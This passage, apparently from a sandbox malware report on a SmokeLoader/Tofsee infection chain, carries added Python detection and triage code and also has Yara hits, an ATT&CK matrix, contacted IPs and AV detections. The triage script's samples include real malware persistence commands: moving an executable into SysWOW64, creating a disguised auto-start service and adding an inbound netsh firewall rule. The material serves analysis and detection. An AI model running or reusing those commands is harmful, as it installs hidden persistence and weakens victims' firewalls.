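        if "\\syswow64\\" in prog.lower():
            findings.append("rule targets the 32-bit (SysWOW64) copy of a system binary")

    if "cmd.exe" in low and re.search(r"\b(move|copy|mkdir|md)\b", low):
        # drop the cmd.exe image path itself; keep the destination
        for target in (p for p in SYSTEM_DIR_PATH.findall(low) if not p.endswith("cmd.exe")):
            findings.append(f"cmd.exe writes into a system directory: {target}")
    return findings

def triage(cmdlines: Sequence[str]) -> Dict[str, List[str]]:
    """Command lines that raised at least one finding, with their findings."""
    result: Dict[str, List[str]] = {}
    for c in cmdlines:
        f = assess(c)
        if f:
            result[c] = f
    return result

# Four command lines from the report's process tree, plus one constructed benign rule.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom' "\\",
    r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom' "\\",
    r'C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support',
    r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul',
    r'netsh advfirewall firewall add rule name="Contoso Agent" dir=in action=allow program="C:\Program Files\Contoso\agent.exe" enable=yes',
]

if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_CMDLINES).items():
        print(cmd[:70] + "...")
        for f in findings:
            print("   -", f)
```

Fed the same fields from a process-creation event (Sysmon event 1 or 4688 with command-line auditing), the checks map onto the two Sigma hits the report lists, with the service-path and Temp-argument checks adding the context that turns a generic "netsh firewall rule added" alert into a persistence finding.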

                      Stealing of Sensitive Information:

                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.444ba90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.3D34.exe.430f910.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.893709342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.825398173.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.893284342.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.826478110.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000000.827053471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoader
                      Source: Yara matchFile source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Raccoon Stealer
                      Source: Yara matchFile source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR
                      Source: Yara matchFile source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match | File source: 18.2.3D34.exe.430f910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.3D34.exe.444ba90.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.3D34.exe.444ba90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.3D34.exe.430f910.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000026.00000000.825922987.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000002.893709342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.825398173.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002D.00000003.893284342.0000000003702000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.826478110.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000026.00000000.827053471.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Yara detected SmokeLoader
Source: Yara match | File source: 1.1.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ECD2MpEBSf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ECD2MpEBSf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ECD2MpEBSf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jgdhbua.6f15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.ECD2MpEBSf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.1.jgdhbua.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ECD2MpEBSf.exe.5715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
Yara detected Raccoon Stealer
Source: Yara match | File source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match | File source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match | File source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\D936.exe | Code function: 17_2_004088B0 CreateThread, CreateThread, send, recv, socket, connect, closesocket, setsockopt, bind, listen, accept, select, getpeername, getsockname
Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe | Code function: 32_2_004088B0 CreateThread, CreateThread, send, recv, socket, connect, closesocket, setsockopt, bind, listen, accept, select, getpeername, getsockname
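The Yara match lines above name memory dumps with a dotted scheme (for example 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp) and unpacked files by process index and name (17.2.D936.exe.400000.0.unpack). The Python below is an added example, not part of the Joe Sandbox report: it cross-references the two naming forms to attribute each dump to a process, decodes the protection field with the Win32 PAGE_* constants, and flags RWX regions at the 0x400000 image base, which is the memory layout behind the report's "overwrites its own PE header" signature. The dump-name field layout (process index in hex, analysis phase, dump id, base address, protection, region type) is inferred from the names on this page, where hex 0x11 equals the decimal index 17 of D936.exe, and is an assumption; the meaning of the last field is also assumed unknown and left undecoded. The sample lines are copied from this report.

```python
"""Attribute Joe Sandbox Yara-match memory dumps to processes and flag in-place unpacking.

Added example; the dump-name field layout used here is inferred from this report, not documented.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Win32 memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# ASSUMPTION: "<procidx>.<phase>.<dumpid>.<base>.<protection>.<type>.sdmp", hex except dumpid.
# Inferred from this report: hex procidx 0x11 == 17, the decimal index of "17.2.D936.exe...unpack".
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)
# "<procidx>.<phase>.<process name>.<base>.<n>[.raw].unpack" (decimal index, hex base).
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<phase>\d+)\.(?P<name>.+?)\.(?P<base>[0-9A-Fa-f]+)\.(?P<n>\d+)(?:\.raw)?\.unpack$"
)
MATCH_RE = re.compile(r"File source:\s*(?P<src>\S+),\s*type:\s*(?P<type>\w+)")
FAMILY_RE = re.compile(r"Yara detected (?P<family>.+?)(?:Show sources)?\s*$")


@dataclass
class Dump:
    family: str
    process_index: int
    phase: int            # assumed: 0 at process start, 2 at exit, 3 during the run
    base: int
    protection: int
    source: str
    process_name: Optional[str] = None

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:x}")

    @property
    def writable_and_executable(self) -> bool:
        return self.protection == 0x40


def process_names(lines: List[str]) -> Dict[int, str]:
    """Map process index -> process name using the .unpack sources in the report."""
    names: Dict[int, str] = {}
    for line in lines:
        m = MATCH_RE.search(line)
        u = UNPACK_RE.match(m.group("src")) if m else None
        if u:
            names.setdefault(int(u.group("proc")), u.group("name"))
    return names


def parse_dumps(lines: List[str]) -> List[Dump]:
    """Collect MEMORY matches; a 'Yara detected <family>' line sets the family for the lines below it."""
    names = process_names(lines)
    family = "unknown"
    dumps: List[Dump] = []
    for line in lines:
        f = FAMILY_RE.search(line)
        if f:
            family = f.group("family").strip()
            continue
        m = MATCH_RE.search(line)
        s = SDMP_RE.match(m.group("src")) if m and m.group("type") == "MEMORY" else None
        if not s:
            continue
        idx = int(s.group("proc"), 16)
        dumps.append(Dump(family, idx, int(s.group("phase"), 16), int(s.group("base"), 16),
                          int(s.group("prot"), 16), m.group("src"), names.get(idx)))
    return dumps


def in_place_unpacks(dumps: List[Dump]) -> List[Dump]:
    """RWX region at the default PE image base: the layout an in-place PE-header overwrite produces."""
    return [d for d in dumps if d.writable_and_executable and d.base == 0x400000]


# Lines copied from this report (a subset of the Tofsee and Raccoon Stealer matches above).
SAMPLE_REPORT_LINES = [
    "Yara detected Tofsee",
    "Source: Yara match | File source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE",
    "Source: Yara match | File source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match | File source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY",
    "Yara detected Raccoon Stealer",
    "Source: Yara match | File source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY",
]

if __name__ == "__main__":
    dumps = parse_dumps(SAMPLE_REPORT_LINES)
    unpacked = in_place_unpacks(dumps)
    for d in dumps:
        flag = "  <- in-place unpack" if d in unpacked else ""
        print(f"{d.family:16} {d.process_name or '?':14} idx={d.process_index:<3} phase={d.phase} "
              f"base=0x{d.base:x} {d.protection_name}{flag}")
```

Run on the full Yara sections of a report, the same code shows which process each memory-only match belongs to (the svchost.exe dump at 0xE70000 is index 0x23, i.e. 35, the Tofsee service host) and separates regions the sample merely wrote (PAGE_READWRITE) from regions it wrote and then executed.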

Mitre Att&ck Matrix

Columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact

The parenthesised digits are the count badges the report attaches to matched techniques, reproduced as extracted; entries without a count are the matrix's unmatched placeholders, and rows with fewer than fourteen cells have empty trailing cells in the original.

Valid Accounts (1) | Native API (531) | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (211) | Input Capture (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (15) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (1) | Valid Accounts (1) | Valid Accounts (1) | Deobfuscate/Decode Files or Information (11) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Input Capture (1) | Exfiltration Over Bluetooth | Encrypted Channel (22) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter (3) | Windows Service (14) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Service Execution (3) | Logon Script (Mac) | Windows Service (14) | Software Packing (43) | NTDS | System Information Discovery (327) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol (5) | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Process Injection (713) | Timestomp (1) | LSA Secrets | Security Software Discovery (651) | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol (36) | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | File Deletion (1) | DCSync | Virtualization/Sandbox Evasion (231) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading (131) | Proc Filesystem | Application Window Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Valid Accounts (1) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation (1) | Network Sniffing | Remote System Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Virtualization/Sandbox Evasion (231) | Input Capture | System Network Configuration Discovery (1) | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Process Injection (713) | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Hidden Files and Directories (1) | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | Defacement

Behavior Graph

Behavior Graph ID: 553404. Sample: ECD2MpEBSf.exe. Start date: 14/01/2022. Architecture: WINDOWS. Score: 100.

The graph is an image in the original report. Its legend distinguishes processes, signatures, created files, DNS/IP info, dropped files, Windows processes, the number of created registry values and files, the implementation language (Visual Basic, Delphi, Java, .NET C# or VB.NET, C/C++ or other), malicious nodes and Internet nodes. Its nodes and edges, written out:

Network contacted from the start node: 185.163.204.24 (local port 49912, remote port 80; CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE, Germany); 86.107.197.138 (ports 38133, 49892; MOD-EUNL, Romania); 10 other IPs or domains.
Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Antivirus detection for dropped file; 20 other signatures.
Processes started from the start node: ECD2MpEBSf.exe; krmdinzg.exe; jgdhbua; 5 other processes, one of which starts WerFault.exe.

ECD2MpEBSf.exe: Contains functionality to inject code into remote processes; Injects a PE file into a foreign processes. Starts a second ECD2MpEBSf.exe.
  ECD2MpEBSf.exe (child): Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration). Injects into explorer.exe.
  explorer.exe (injected): contacts 185.233.81.115:443 (SUPERSERVERSDATACENTERRU, Russian Federation), 188.166.28.199:80 (DIGITALOCEAN-ASNUS, Netherlands) and 11 other IPs or domains. Drops C:\Users\user\AppData\Roaming\jgdhbua (PE32), C:\Users\user\AppData\Local\Temp\FB58.exe (PE32), C:\Users\user\AppData\Local\Temp\E3A9.exe (PE32) and 12 other malicious files. Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier). Starts CCB2.exe, D936.exe, 3D34.exe and BB8A.exe.
    CCB2.exe: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); 4 other signatures.
    D936.exe: drops C:\Users\user\AppData\Local\...\krmdinzg.exe (PE32). Signatures: Machine Learning detection for dropped file; Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall. Starts two cmd.exe instances, sc.exe and 3 other processes, each with its own conhost.exe; the first cmd.exe drops C:\Windows\SysWOW64\...\krmdinzg.exe (copy) (PE32).
    3D34.exe: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes. Starts a second 3D34.exe.
    BB8A.exe: starts WerFault.exe.

krmdinzg.exe: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Writes to foreign memory regions; Allocates memory in foreign processes. Starts svchost.exe.
  svchost.exe: contacts microsoft-com.mail.protection.outlook.com (104.47.53.36:25; MICROSOFT-CORP-MSN-AS-BLOCKUS, United States) and patmushta.info (94.142.143.116:443; IHOR-ASRU, Russian Federation). Signature: System process connects to network (likely due to code injection or exploit).

jgdhbua: Machine Learning detection for dropped file. Starts a second jgdhbua.
  jgdhbua (child): Creates a thread in another existing process (thread injection).

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
ECD2MpEBSf.exe | 36% | Virustotal | -
ECD2MpEBSf.exe | 100% | Joe Sandbox ML | -

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\888A.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\CADF.exe | 100% | Avira | HEUR/AGEN.1212012
C:\Users\user\AppData\Local\Temp\3D34.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\6C37.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\D936.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\krmdinzg.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\jgdhbua | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\CCB2.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\A332.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\3D34.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\A4DE.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\FB58.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\E3A9.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\D502.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\BB8A.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\9889.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Temp\3D34.exe | 46% | Metadefender | -
C:\Users\user\AppData\Local\Temp\3D34.exe | 89% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\6C37.exe | 50% | ReversingLabs | Win32.Infostealer.Generic
C:\Users\user\AppData\Local\Temp\A332.exe | 34% | Metadefender | -
C:\Users\user\AppData\Local\Temp\A332.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt
C:\Users\user\AppData\Local\Temp\A4DE.exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
C:\Users\user\AppData\Local\Temp\BB8A.exe | 46% | Metadefender | -
C:\Users\user\AppData\Local\Temp\BB8A.exe | 77% | ReversingLabs | Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\FB58.exe | 34% | Metadefender | -
C:\Users\user\AppData\Local\Temp\FB58.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt

                      Unpacked PE Files

Source | Detection | Scanner | Label
1.0.ECD2MpEBSf.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244
11.0.jgdhbua.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.BB8A.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.3.D936.exe.22d0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.1.ECD2MpEBSf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.jgdhbua.6f15a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
